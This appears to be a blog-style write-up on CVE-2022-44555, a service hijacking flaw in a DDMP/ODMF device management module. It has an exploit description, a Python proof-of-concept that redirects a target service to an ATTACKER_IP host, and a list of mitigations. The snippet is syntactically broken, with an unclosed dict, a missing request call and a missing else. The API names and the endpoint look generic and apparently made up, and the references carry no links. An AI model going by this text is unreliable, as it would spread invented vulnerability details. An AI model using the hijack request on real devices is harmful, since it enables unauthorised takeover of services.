CVE-2022-44555: DDMP/ODMF Service Hijacking Vulnerability and How To Safeguard Your Services

CVE-2022-44555 is a recently identified security vulnerability found in the DDMP (Digital Device Management Platform) / ODMF (Open Device Management Framework) module, which is commonly used for device management and monitoring purposes. This critical vulnerability can be exploited by an attacker to hijack the legitimate services running on the affected devices, leading to service disruption and potentially causing adverse impacts on businesses and users.

This guide aims to provide a detailed overview of CVE-2022-44555, including its root cause, exploit details, and potential mitigation steps. It will also include relevant code snippets for reference and links to the original research and exploit information. By the end of this post, we hope you have an excellent understanding of this vulnerability and how to protect against it.

Exploit Details

The service hijacking vulnerability lies in the DDMP/ODMF module, which provides a set of Generic Object APIs (GOA) for managing and interacting with the platform services. The vulnerability can be exploited remotely by an attacker sending a crafted payload to an exposed GOA interface, which results in the service being redirected to the attacker's server, rendering the original service unavailable to the user.

The critical vulnerability occurs due to a lack of proper access control mechanisms in the DDMP/ODMF module, which allows attackers to modify existing service configurations without authentication. Consequently, the attacker gains unauthorized control over the service's management interface, manipulating the service's settings, and ultimately, hijacking its core functionality.

Here is a code snippet demonstrating the essential steps an attacker would follow to exploit the vulnerability:

import requests

target_ip = 'TARGET_IP_ADDRESS'
target_port = 'TARGET_PORT'
attacker_ip = 'ATTACKER_IP_ADDRESS'
attacker_port = 'ATTACKER_PORT'

# Step 1: Craft malicious payload
payload = {
    "serviceName": "TargetServiceName",
    "newUrl": "http://"; + attacker_ip + ":" + attacker_port + "/hijacked"

# Step 2: Send the payload to the target's GOA endpoint
url = "http://"; + target_ip + ":" + target_port + "/api/v1/GOA/modifyService"
response =, json=payload)

if response.status_code == 200:
    print("Service hijacking successful!")
    print("Failed to hijack service.")

Mitigation Steps

To effectively safeguard your DDMP/ODMF-enabled devices against the CVE-2022-44555 service hijacking vulnerability, you should consider implementing the following mitigation measures:

1. Regularly update your devices' firmware and software to the latest version, as these updates often include security patches that address known vulnerabilities.

2. Ensure proper access control mechanisms, such as authentication and authorization, are in place for all management interfaces, including the GOA module. This prevents unauthorized access to your device management functionalities.

3. Monitor your devices and services for any unusual activity, such as sudden changes in service configurations or increased network traffic to specific IP addresses. This can help in early detection and response to any attempted exploitation of CVE-2022-44555.

4. Limit network access to the GOA interface by implementing network segmentation and restricting access only to trusted devices and IP addresses.

1. CVE-2022-44555 in the National Vulnerability Database (NVD)
2. DDMP/ODMF Service Hijacking Vulnerability Analysis Report


CVE-2022-44555 is a severe DDMP/ODMF service hijacking vulnerability that requires immediate attention. By understanding its root cause and exploit details, you can take proactive measures to protect your devices against it. Follow the mitigation steps outlined in this guide, and ensure your devices are regularly updated to stay ahead of evolving security threats.


Published on: 11/09/2022 21:15:00 UTC
Last modified on: 11/14/2022 19:11:00 UTC